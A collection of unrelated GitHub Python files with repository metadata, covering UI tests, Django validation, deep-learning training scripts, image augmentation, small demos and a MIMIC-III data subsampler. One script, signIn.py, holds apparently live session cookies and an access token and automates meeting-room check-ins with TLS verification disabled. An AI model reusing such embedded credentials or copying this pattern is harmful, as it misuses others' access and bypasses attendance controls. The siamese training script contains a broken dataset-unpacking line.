DeviceInfoUtil().getBuildVersion()\n date = time.strftime('%Y-%m-%d').split('-')\n yesDate = datetime.datetime.now() - datetime.timedelta(days = 1)\n beforeDate = yesDate.strftime('%Y-%m-%d').split('-')\n\n if date[2] == '01':\n day = date[2]\n else:\n day = beforeDate[2]\n\n if int(version.split(\".\")[0]) < 5:\n if date[1] == '01':\n month = u\"一月\"\n elif date[1] == '02':\n month = u\"二月\"\n elif date[1] == '03':\n month = u\"三月\"\n elif date[1] == '04':\n month = u\"四月\"\n elif date[1] == '05':\n month = u\"五月\"\n elif date[1] == '06':\n month = u\"六月\"\n elif date[1] == '07':\n month = u\"七月\"\n elif date[1] == '08':\n month = u\"八月\"\n elif date[1] == '09':\n month = u\"九月\"\n elif date[1] == '10':\n month = u\"十月\"\n elif date[1] == '11':\n month = u\"十一月\"\n elif date[1] == '12':\n month = u\"十二月\"\n else:\n if date[1] == '01':\n month = u\"January\"\n elif date[1] == '02':\n month = u\"February\"\n elif date[1] == '03':\n month = u\"March\"\n elif date[1] == '04':\n month = u\"April\"\n elif date[1] == '05':\n month = u\"May\"\n elif date[1] == '06':\n month = u\"June\"\n elif date[1] == '07':\n month = u\"July\"\n elif date[1] == '08':\n month = u\"August\"\n elif date[1] == '09':\n month = u\"September\"\n elif date[1] == '10':\n month = u\"October\"\n elif date[1] == '11':\n month = u\"November\"\n elif date[1] == '12':\n month = u\"December\"\n\n startDate = date[0] + '-' + date[1] + '-' + day\n\n if date[2] == '01':\n clickStartDate = day + \" \" + month + \" \" + date[0] + \" selected\"\n else:\n clickStartDate = day + \" \" + month + \" \" + date[0]\n\n API().clickElementByContentDesc(self.testcase,\n self.driver,\n self.logger,\n clickStartDate,\n LFZDPC.verify_timeout)\n logger.info(\"Click 自定义查询时间 end\")\n\n if int(version.split(\".\")[0]) < 5:\n logger.info(\"Click 确定 Button begin\")\n API().clickElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_confirm,\n LFZDPC.verify_timeout)\n logger.info(\"Click 确定 Button end\")\n else:\n logger.info(\"Click 确定 Button begin\")\n API().clickElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_confirm_ok,\n LFZDPC.verify_timeout)\n logger.info(\"Click 确定 Button end\")\n logger.info(\"Click 自定义 end\")\n\n return startDate\n\n def validSeachDate(self, startDate = \"default\"):\n '''\n usage: 验证查询日期\n '''\n logger.info(\"Check 查询日期 begin\")\n searchDate = API().getTextByResourceId(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.resouce_id_search_date,\n LFZDPC.verify_timeout)\n\n searchEndDate = time.strftime('%Y-%m-%d')\n\n if(startDate.split('-')[2] == \"01\") and (searchEndDate.split('-')[2] == \"01\"):\n searchContent = u\"查询时间 : \" + startDate\n else:\n searchContent = u\"查询时间 : \" + startDate + u\"至\" + searchEndDate\n\n API().assertEqual(self.testcase,\n self.logger,\n searchDate,\n searchContent)\n logger.info(\"Check 查询日期 end\")\n\n def validOrderInfo(self):\n '''\n usage: 验证订单信息\n '''\n logger.info(\"Check 订单信息 begin\")\n data = API().validElementByText(self.driver,\n self.logger,\n LFZDPC.text_pay_type,\n LFZDPC.verify_timeout)\n\n if data:\n payType = API().getElementsByResourceId(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.resource_id_type,\n LFZDPC.verify_timeout)\n API().assertEqual(self.testcase, self.logger, payType, LFZDPC.text_lefu_pay)\n logger.info(\"Check 订单信息 
end\")\n","repo_name":"liu111xiao111/UItest","sub_path":"pages/android/shanghu/lefuzhangdan_page.py","file_name":"lefuzhangdan_page.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2045493535","text":"from Course.models import Course\nimport re\n\nclass CreateCourse:\n\n \"\"\"\n This method will create a course given a list of strings, \"command\"\n command[0] = createCourse\n command[1] = courseName\n command[2] = courseNumber\n command[3] = campus/online\n command[4] = daysOfWeek\n command[5] = start time\n command[6] = endTime\n\n If given valid values, the course will be created and added to the database. A confirmation\n message will be returned. If any arguments are invalid, an error message will be returned.\n \"\"\"\n\n def createCourse(self, command):\n\n # Check that the command has the appropriate number of arguments\n if len(command) != 7:\n return \"Your command is missing arguments, please enter your command in the following form: \" \\\n \"createCourse courseName courseNumber onCampus daysOfWeek start end\"\n\n # Course number checks\n if not re.match('^[0-9]*$', command[2]):\n return \"Course number must be numeric and three digits long\"\n if len(command[2]) != 3:\n return \"Course number must be numeric and three digits long\"\n # Check that the course does not already exist\n if Course.objects.filter(number=command[2]).exists():\n return \"Course already exists\"\n # Location checks\n if command[3].lower() != \"online\" and command[3].lower() != \"campus\":\n return \"Location is invalid, please enter campus or online.\"\n # Days check\n for i in command[4]:\n if i not in 'MTWRFN':\n return \"Invalid days of the week, please enter days in the format: MWTRF or NN for online\"\n # Check times\n startTime = command[5]\n endTime = command[6]\n if len(startTime) != 4 or len(endTime) != 4:\n return \"Invalid start or end time, please use a 4 digit military time representation\"\n if not re.match('^[0-2]*$', startTime[0]) or not re.match('^[0-1]*$', endTime[0]):\n return \"Invalid start or end time, please use a 4 digit military time representation\"\n for i in range (1,3):\n if not (re.match('^[0-9]*$', startTime[i])) or not (re.match('^[0-9]*$', endTime[i])):\n return \"Invalid start or end time, please use a 4 digit military time representation\"\n\n # Else the course is ok to be created\n else:\n c = Course(name=command[1], number=command[2])\n if command[3].lower() == \"online\":\n c.onCampus = False\n else:\n c.onCampus = True\n c.classDays = command[4]\n c.classHoursStart = command[5]\n c.classHoursEnd = command[6]\n c.save()\n return \"Course successfully created\"\n","repo_name":"mblahnik/Project","sub_path":"Course/CreateCourse.py","file_name":"CreateCourse.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26439715493","text":"# 0 1 2 3 4\nlistaEstudiantes = [\"ana\", \"juan\", \"maria\", \"pedro\", \"lady\"]\n\n## Ciclo for accedienda directamente a la lista\n#for estudiante in listaEstudiantes:\n# print (\"Hola \", estudiante)\n\nindices = [0,1,2,3,4]\n\n## Ciclo for a travéz de una lista de indices \"manual\" \n#for i in indices:\n# estudiante = listaEstudiantes [i]\n# print (\"Hola \", estudiante)\n\n## Ciclo for a traves de una lista automática \"range\"\nfor i in range (0,5):\n estudiante = listaEstudiantes [i]\n print (\"Hola \", 
estudiante)\n","repo_name":"lgarreta/lgcursos","sub_path":"MinTIC2021/ciclo01-python/semana4/ejemplos/lista-estudiantes.py","file_name":"lista-estudiantes.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5906324101","text":"# --*-- coding: utf-8 --*--\n# from urllib import request\n\nimport requests\nfrom requests.packages import urllib3\nimport json\nimport time\nfrom datetime import datetime\nurllib3.disable_warnings()\n\nurl_201='https://cal.corp.kuaishou.com/e/calendar/meetingroom/scanCode/fcABC7Rl0G_109VffUMCNsKDa'\nurl_204='https://cal.corp.kuaishou.com/e/calendar/meetingroom/scanCode/fcADlilf7F6A58RAUOhZsxHzy'\nurl_205='https://cal.corp.kuaishou.com/e/calendar/meetingroom/scanCode/fcADktjRpmQcoofqkx0sZFbRX'\nurl1='https://home.corp.kuaishou.com/api/home/block?blockName=calendarStrokeViewDTO'\nurl_msg='https://is.corp.kuaishou.com/wx/message/send?access_token=ACE94AC400DAD05B82B375FA5CD59965'\n\nheader1={\n'Cookie': 'accessproxy_session=1463632a-ab85-4886-bd9a-367ac1cbbdbd; k-token=89e3d52c8ca0089c278695faab422c79;'\n\n}\n\nheader2={\n'Cookie': '_did=web_894943991EC8551C; KXID=8kv0UjInJNsoW27gI4CvZJltTzNxYtTLtJIEPO25GBtPpTiRLa-RNj1ZyUr7lu9Pi44lAjT-sEXj-fNnqfgKNYpcUvRfnioSQhpFNwT-23UVCuzRoP7OpNzoLW8iqN_Y; accessproxy_session=7a6d06c1-f477-4218-b4c4-91b2feb763e5;'\n\n}\n\n\ndef msg_send(content):\n body={\n \"touser\" : \"wangyaxing03\",\n \"msgtype\" : \"text\",\n \"text\" : {\n \"content\" : content\n },\n \"safe\":0\n }\n header_msg={\n 'Content-Type':'application/json'\n\n }\n requests.post(url_msg,headers=header_msg,data=json.dumps(body),verify=False)\n \ndef job(): \n try:\n html=requests.get(url1,headers=header1,verify=False).text\n json_res = json.loads(html)\n # print(json_res)\n date_pattern = \"%Y年%m月%d日%H:%M\"\n mettings = json_res['calendarStrokeDetailViewDTOS']\n for m in mettings:\n # print(m['meetingDate'])\n if(m['spot'] is None):\n continue\n date=datetime.strptime(m['meetingDate']+m['beginTime'], date_pattern)\n if(0==datetime.now().day-date.day):\n if((datetime.now()-date).seconds<=600 or (datetime.now()-date).seconds>=86100):\n # print((datetime.now()-date).seconds)\n if('201' in m['spot']):\n html=requests.get(url_201,headers=header2,verify=False).text\n if(html.find(\"201 关雎\")>0):\n string=datetime.now().strftime(date_pattern)+' '+m['topic']+ m['spot']+'已签到'\n print(string)\n msg_send(string)\n else:\n try:\n raise NameError(\"cookie过期\")\n except NameError:\n msg_send('cookie过期')\n elif('204' in m['spot']):\n html=requests.get(url_204,headers=header2,verify=False).text\n if(html.find(\"204 汉广\")>0):\n string=datetime.now().strftime(date_pattern)+' '+m['topic']+ m['spot']+'已签到'\n print(string)\n msg_send(string)\n else:\n try:\n raise NameError(\"cookie过期\")\n except NameError:\n msg_send('cookie过期')\n elif('205' in m['spot']):\n html=requests.get(url_205,headers=header2,verify=False).text\n if(html.find(\"205 麟之\")>0):\n string=datetime.now().strftime(date_pattern)+' '+m['topic']+ m['spot']+'已签到'\n print(string)\n msg_send(string)\n else:\n try:\n raise NameError(\"cookie过期\")\n except NameError:\n msg_send('cookie过期')\n else:\n print('该会议室没有签到链接')\n else:\n print(datetime.now().strftime(date_pattern)+' '+m['topic']+'暂时不用签到')\n \n except Exception:\n msg_send('cookie过期')\n\n\nwhile True:\n job()\n 
time.sleep(300)","repo_name":"smqh-smqh/kwai","sub_path":"gits/signIn.py","file_name":"signIn.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6642636285","text":"# import the necessary packages\nfrom siameseConfig.siamese_network import build_siamese_model\nfrom siameseConfig import config\nfrom siameseConfig import utils\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Lambda\nfrom tensorflow.keras.datasets import mnist\nimport numpy as np\nimport tensorflow as tf\n\ntrain_ds = tf.keras.utils.image_dataset_from_directory(\n directory='/Users/alfredo/Desktop/Wellington/WellingtonV2/dataset/training_data',\n labels='inferred',\n image_size=(180, 180),\n color_mode= 'rgb')\n\n(trainX, trainY), (testX, testY) = train_ds\ntrainX = trainX / 255.0\ntestX = testX / 255.0\n# add a channel dimension to the images\ntrainX = np.expand_dims(trainX, axis=-1)\ntestX = np.expand_dims(testX, axis=-1)\n# prepare the positive and negative pairs\nprint(\"[INFO] preparing positive and negative pairs...\")\n(pairTrain, labelTrain) = utils.make_pairs(trainX, trainY)\n(pairTest, labelTest) = utils.make_pairs(testX, testY)\n\nprint(\"[INFO] building siamese network...\")\nimgA = Input(shape=config.IMG_SHAPE)\nimgB = Input(shape=config.IMG_SHAPE)\nfeatureExtractor = build_siamese_model(config.IMG_SHAPE)\nfeatsA = featureExtractor(imgA)\nfeatsB = featureExtractor(imgB)\n\ndistance = Lambda(utils.euclidean_distance)([featsA, featsB])\noutputs = Dense(1, activation=\"sigmoid\")(distance)\nmodel = Model(inputs=[imgA, imgB], outputs=outputs)\n\nprint(\"[INFO] compiling model...\")\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\",\n\tmetrics=[\"accuracy\"])\n\nprint(\"[INFO] training model...\")\nhistory = model.fit(\n\t[pairTrain[:, 0], pairTrain[:, 1]], labelTrain[:],\n\tvalidation_data=([pairTest[:, 0], pairTest[:, 1]], labelTest[:]),\n\tbatch_size=config.BATCH_SIZE, \n\tepochs=config.EPOCHS)\n\nprint(\"[INFO] saving siamese model...\")\nmodel.save(config.MODEL_PATH)\n# plot the training history\nprint(\"[INFO] plotting training history...\")\nutils.plot_training(history, config.PLOT_PATH)","repo_name":"Alfredomanjon/Wellington-Models","sub_path":"WellingtonV2/train_siamese_network.py","file_name":"train_siamese_network.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72236193120","text":"import time, os, sys\r\n\r\n#убираем записи о команде выключиться\r\nf = open('000.die', 'w')\r\nf.write('')\r\nf.close()\t\t\r\na = ''\r\n\r\nwhile a=='':\r\n\ttime.sleep(1)\r\n\tprint(0)\r\n\ttry:\r\n\t\t#пишем свой статус\r\n\t\tf = open('000.status', 'w')\r\n\t\tf.write('1')\r\n\t\tf.close()\t\t\r\n\texcept:\r\n\t\ta = 1\r\n\r\n\ttry: #проверяем нет ли команды прекратить\r\n\t\tf = open('000.die')\r\n\t\ta = f.read()\r\n\t\tf.close()\r\n\texcept:\r\n\t\ta = ''","repo_name":"Chegevarich/py_learn","sub_path":"cw_00/process/000.py","file_name":"000.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36798964607","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Conv2D , MaxPooling2D, Flatten, Dense, Dropout, 
GlobalAveragePooling2D\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nimport matplotlib.pyplot as plt\n\nfrom glob import glob\n\nbatchSize = 32\nepochs = 200\n\nTRAINING_DIR = \"C:/Users/sscan/PycharmProjects/EE475Project/train\"\n\nNumOfClasses = len(glob(\"C:/Users/sscan/PycharmProjects/EE475Project/train/*\"))\n\nprint(NumOfClasses)\n\ntrain_datagen = ImageDataGenerator(rescale = 1/255.0,\n rotation_range = 30,\n zoom_range = 0.4,\n horizontal_flip=True,\n shear_range = 0.4)\n\ntrain_generator = train_datagen.flow_from_directory(TRAINING_DIR,\n batch_size=batchSize,\n class_mode= 'categorical',\n target_size=(190,190))\n\nVALIDATION_DIR = \"C:/Users/sscan/PycharmProjects/EE475Project/validation\"\nval_datagen = ImageDataGenerator(rescale = 1/255.0)\nval_generator = train_datagen.flow_from_directory(VALIDATION_DIR,\n batch_size=batchSize,\n class_mode= 'categorical',\n target_size=(190,190))\n\ncallBack = EarlyStopping(monitor='val_loss', patience = 5, verbose = 1, mode = 'auto')\n\nbestModelFilename = \"C:/Users/sscan/PycharmProjects/EE475Project/chess_best_model.h5\"\n\nbestModel = ModelCheckpoint(bestModelFilename, monitor = 'val_accuracy', verbose = 1, save_best_only = True)\n\n#MODEL\n\nmodel = Sequential([\n Conv2D(32,(3,3), activation = 'relu', input_shape=(None,None,3)),\n MaxPooling2D(2,2),\n\n Conv2D(64,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n Conv2D(64,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n Conv2D(128,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n Conv2D(256,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n GlobalAveragePooling2D(),\n\n Dense(512, activation='relu'),\n Dense(512, activation='relu'),\n\n Dense(NumOfClasses, activation = 'softmax')\n])\n\nprint(model.summary())\n\nmodel.compile(optimizer = 'Adam', loss = 'categorical_crossentropy', metrics=['accuracy'] )\n\nhistory = model.fit(train_generator,\n epochs =epochs,\n verbose = 1,\n validation_data = val_generator,\n callbacks = [bestModel])\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(epochs, acc , 'r', label = \"Train Accuracy\")\nplt.plot(epochs, val_acc, 'b', label = \"Validation Accuracy\")\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.show()\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(epochs, loss , 'r', label = \"Train Loss\")\nplt.plot(epochs, val_loss, 'b', label = \"Validation Loss\")\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.show()\n\n\n","repo_name":"sscander17/Chess-position-detection-from-2d-images-using-CNN","sub_path":"BuildTheModel.py","file_name":"BuildTheModel.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8936724776","text":"import torch, torchvision\nimport torchvision.transforms.functional as F\n\nfrom PIL import Image, ImageOps\n\n\nclass Compose:\n \"\"\"\n Composes several transforms together.\n \"\"\"\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, image, bboxs):\n for t in self.transforms:\n image, bboxs = t(image, bboxs)\n return image, bboxs\n\n\nclass ToTensor:\n \"\"\"\n Converts a PIL Image or numpy.ndarray (H x W x C) to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0].\n Only 
applied to image, not bboxes.\n \"\"\"\n def __call__(self, image, bboxs):\n return F.to_tensor(image), bboxs\n \n \nclass Normalize(torch.nn.Module):\n \"\"\"\n Normalize a tensor image with mean and standard deviation.\n Only applied to image, not bboxes.\n \"\"\"\n def __init__(self, mean, std, inplace=False):\n super().__init__()\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def forward(self, image, bboxs):\n return F.normalize(image, self.mean, self.std, self.inplace), bboxs\n \n \nclass Resize(torch.nn.Module):\n \"\"\"\n Resize the short side of image to given size.\n Assume the coords are given min_x, min_y, max_x, max_y.\n Both applied to image and bboxes.\n \"\"\"\n def __init__(self, min_size, max_size):\n super().__init__()\n self.min_size = min_size\n self.max_size = max_size\n\n def forward(self, image, bboxs):\n return resize(image, bboxs, self.min_size, self.max_size)\n \n \nclass Flip(torch.nn.Module):\n \"\"\"\n Apply horizontal flip on image and bboxes.\n Assume the coords are given min_x, min_y, max_x, max_y.\n Both applied to image and bboxes.\n \"\"\"\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, image, bboxs):\n if torch.rand(1) < self.p:\n flip_image = ImageOps.mirror(image)\n if bboxs == None:\n return flip_image, bboxs\n else:\n flip_bbox = flip(image, bboxs)\n return flip_image, flip_bbox\n else:\n return image, bboxs\n \n \ndef resize(img, bboxs, min_size, max_size):\n w, h = img.size\n min_side, max_side = min(w, h), max(w, h)\n \n ratio = min(min_size / min_side, max_size / max_side)\n resize_w, resize_h = int(ratio * w), int(ratio * h)\n ratio_w, ratio_h = resize_w / w, resize_h / h\n \n resize_img = img.resize((resize_w, resize_h), resample=Image.BILINEAR)\n resize_bboxs = bboxs.clone()\n if bboxs != None:\n resize_bboxs[:, 0::2] = bboxs[:, 0::2] * ratio_w\n resize_bboxs[:, 1::2] = bboxs[:, 1::2] * ratio_h\n return resize_img, resize_bboxs\n \n \ndef flip(img, bboxs):\n img = F.pil_to_tensor(img)\n _, h, w = img.shape\n\n flip_bboxs = []\n for bbox in bboxs:\n min_x, min_y, max_x, max_y = bbox\n flip_min_x, flip_max_x = w-min_x, w-max_x\n flip_bboxs.append(torch.FloatTensor([flip_max_x, min_y, flip_min_x, max_y]))\n return torch.stack(flip_bboxs)","repo_name":"Jasonlee1995/Faster_RCNN","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"72117460642","text":"class MsgDelta:\n def __init__(self):\n self.elevator = 0.0 # elevator\n self.aileron = 0.0 # aileron\n self.rudder = 0.0 # rudder\n self.throttle_right = 0.0 # throttle for right motor \n self.throttle_left = 0.0 # throttle for left motor\n self.throttle_rear = 0.0 # throttle for back motor\n self.motor_right = 0.0 # right motor commanded angle\n self.motor_left = 0.0 # left motor commanded angle\n # self.elevon_right = 0.0 # right elevon angle in radians\n # self.elevon_left = 0.0 # left elevon in radians\n # # need to be able to command left and right motor angles\n # self.servo_right = 0.0 # commanded right servo angle in radians\n # self.servo_left = 0.0 # commanded left servo angle in radians\n\n\n","repo_name":"byu-magicc/vtolsim","sub_path":"message_types/msg_delta.py","file_name":"msg_delta.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42019022593","text":"import cv2\n\nsrc = 
cv2.imread(\"../images/cat.jpg\", cv2.IMREAD_COLOR)\ndst = cv2.resize(src, dsize=(800, 600), interpolation=cv2.INTER_LINEAR) # 이미지 확대시\ndst2 = cv2.resize(src, dsize=(0, 0), fx=0.3, fy=0.7, interpolation=cv2.INTER_AREA) # 이미지 축소시\n\ncv2.imshow(\"src\", src)\ncv2.imshow(\"dst\", dst)\ncv2.imshow(\"dst2\", dst2)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"projectjh/aischool","sub_path":"AI/04.DeepLearning/OpenCV/20221024/11_resize.py","file_name":"11_resize.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7286955782","text":"# -*- coding:UTF-8 -*-\nimport Tkinter\nimport tkMessageBox #对话框\nimport urllib,urllib2,re\nfrom PIL import Image\n\n\n\nwindow = Tkinter.Tk() #创建窗口\nwindow.title(\"Test GUI\")\nwindow.geometry(\"800x200\")\nname=Tkinter.Label(window,text = \"姓名:\",font=(\"微软雅黑\",40),fg = \"red\") #文本框\nname.grid() #grid是一个布局方法,place和\nnameent = Tkinter.Entry(window,font =(\"微软雅黑\",40)) #单行输入框,多行为\nnameent.grid(row=0,column=1) #设置位置\nbutton= Tkinter.Button(window,text =\"一键设置签名\",font =(\"微软雅黑\",10),width=\"15\",height=\"1\")\nbutton.grid(row=1,column=1) #设置button位置\n\nwindow.mainloop() #运行窗口\n\n","repo_name":"oldwai/windows_tianlang_pycharm","sub_path":"Pycharm_py/Py_GUI/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74389274082","text":"\nN, M, C = list(map(int, input().split()))\nprint(f\"N: {N}, M: {M}, C: {C}\")\n\nINF = int(10e9)\n# for save the distance\nd = [INF] * (N+1)\n\n# for saving adj node\nfrom collections import defaultdict\ngraph = defaultdict(list)\n\nfor _ in range(M):\n X, Y, Z = list(map(int, input().split()))\n graph[X].append((Y, Z))\n\n# start solving problem\nfrom heapq import heappush, heappop\n\nheap = []\nd[C] = 0\nheappush(heap, (0, C))\n\nwhile heap:\n dist, now = heappop(heap)\n\n if d[now] < dist:\n continue\n\n for nb, time in graph[now]:\n cost = dist + time\n\n if cost < d[nb]:\n d[nb] = cost\n heappush(heap, (cost, nb))\n\n# count the result\ncount = 0\nmax_distance = 0\n\nfor i in range(N+1):\n if d[i] != INF and i != C:\n count += 1\n max_distance = max(max_distance, d[i])\n\nprint(count, max_distance)\n\n\n\n\n\n\n","repo_name":"OnePercentMagic/ProblemSolvingProject","sub_path":"shortest_path/telecommunication.py","file_name":"telecommunication.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21066015475","text":"import os\nimport pandas as pd\nfrom sklearn.utils.random import sample_without_replacement\n\n########################################################################################################################\n# MIMIC III DATASET SUB-SAMPLER\n########################################################################################################################\n\nRAND_SEED = 62368\nSAMPLE_SIZE = 10_000\nMIMIC_III_PATH = './MIMIC III/'\nDATA_SUBSET_PATH = './M3_Subset/'\n\nos.chdir('/') # NOTE Set to correct project directory\n\nassert os.path.isdir(MIMIC_III_PATH), f\"{MIMIC_III_PATH} directory is missing\"\nassert os.path.isfile(MIMIC_III_PATH + 'ICUSTAYS.csv'), \"ICUSTAYS.csv file is missing\"\nassert os.path.isfile(MIMIC_III_PATH + 'CHARTEVENTS.csv'), \"CHARTEVENTS.csv file is missing\"\n\nif not os.path.isdir(DATA_SUBSET_PATH):\n os.mkdir(DATA_SUBSET_PATH)\n\n# STEP 
1: RANDOMLY SAMPLE INDICES FROM ICUSTAYS\n\n\ndef lower_columns(df):\n df_cols = list(df)\n df_cols_lowercase = [col_name.lower() for col_name in df_cols]\n cols_dict = dict(zip(df_cols, df_cols_lowercase))\n\n df.rename(columns=cols_dict, inplace=True)\n\n\nicu_stays = pd.read_csv(MIMIC_III_PATH + 'ICUSTAYS.csv', header=0, parse_dates=['INTIME', 'OUTTIME'])\nlower_columns(icu_stays)\n\nsubset_idx = sample_without_replacement(icu_stays.shape[0], SAMPLE_SIZE, random_state=RAND_SEED)\n\n# STEP 2: SUB-SAMPLE ICUSTAYS.CSV\n\nicu_stays = icu_stays.loc[subset_idx]\nicu_stays.to_csv(DATA_SUBSET_PATH + 'ICUSTAYS.csv', mode='w')\n\n# STEP 3: SUB-SAMPLE CHARTEVENTS.CSV\n\nCHUNK_SIZE = 10000000\nCHART_EVENT_COLS = ['ROW_ID', 'SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID', 'ITEMID', 'CHARTTIME', 'VALUENUM']\n\nif os.path.isfile(DATA_SUBSET_PATH + 'CHARTEVENTS.csv'):\n os.remove(DATA_SUBSET_PATH + 'CHARTEVENTS.csv')\n\nwith pd.read_csv(MIMIC_III_PATH + 'CHARTEVENTS.csv', usecols=CHART_EVENT_COLS, parse_dates=['CHARTTIME'], chunksize=CHUNK_SIZE) as reader:\n for i, chunk in enumerate(reader):\n lower_columns(chunk)\n chunk = chunk.loc[chunk['icustay_id'].isin(icu_stays['icustay_id'])]\n header = True if i == 0 else None\n\n chunk.to_csv(DATA_SUBSET_PATH + 'CHARTEVENTS.csv', header=header, mode='a')\n\n# STEP 4: (OPTIONAL) LOWERCASE COLUMNS FOR REMAINING FILES\n\nALL_FILES_LOWER_COLUMNS = True\nOTHER_FILES = ['PATIENTS.csv', 'DIAGNOSES_ICD.csv', 'D_ITEMS.csv']\n\nif ALL_FILES_LOWER_COLUMNS:\n for filename in OTHER_FILES:\n df = None\n\n if filename == 'PATIENTS.csv':\n df = pd.read_csv(MIMIC_III_PATH + filename, header=0, parse_dates=['DOB', 'DOD', 'DOD_HOSP', 'DOD_SSN'])\n else:\n df = pd.read_csv(MIMIC_III_PATH + filename, header=0)\n\n lower_columns(df)\n df.to_csv(DATA_SUBSET_PATH + filename, mode='w')\n","repo_name":"karlvosatka/lstm-cnn-mimic-3","sub_path":"data_sampling/datasampler.py","file_name":"datasampler.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"501530371","text":"from django.core import checks\n\n\ndef check_all_index_strategies_current(app_configs, **kwargs):\n from share.search import IndexStrategy\n from share.search.exceptions import IndexStrategyError\n errors = []\n for index_strategy in IndexStrategy.all_strategies():\n try:\n index_strategy.assert_strategy_is_current()\n except IndexStrategyError as exception:\n errors.append(\n checks.Error(\n 'IndexStrategy changed without checksum confirmation!',\n hint=str(exception),\n obj=index_strategy,\n id='share.search.E001',\n )\n )\n return errors\n","repo_name":"CenterForOpenScience/SHARE","sub_path":"share/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"2452517435","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n# Any results you write to the current directory are saved as output.\n\n\nimport cv2\nimport os, gc, sys, glob\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom sklearn import model_selection\nfrom sklearn import metrics\n\n\nimport keras\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.metrics import categorical_accuracy\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_set = pd.read_csv('../input/train_labels.csv')\ntest_set = pd.read_csv('../input/sample_submission.csv')\n\ndef read_img(img_path):\n img = cv2.imread(img_path)\n img = cv2.resize(img, (128, 128))\n return img\n\ntrain_img, test_img = [], []\nfor img_path in tqdm(train_set['name'].iloc[: ]):\n train_img.append(read_img('../input/train/' + str(img_path) + '.jpg'))\nfor img_path in tqdm(test_set['name'].iloc[: ]):\n test_img.append(read_img('../input/test/' + str(img_path) + '.jpg'))\n\ntrain_img = np.array(train_img, np.float32) / 255\ntrain_label = np.array(train_set['invasive'].iloc[: ])\ntest_img = np.array(test_img, np.float32) / 255\n\ndef model_nn():\n model = Sequential()\n model.add(Conv2D(16, (3, 3), activation='relu', input_shape=(128, 128, 3)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(64, (3, 3), 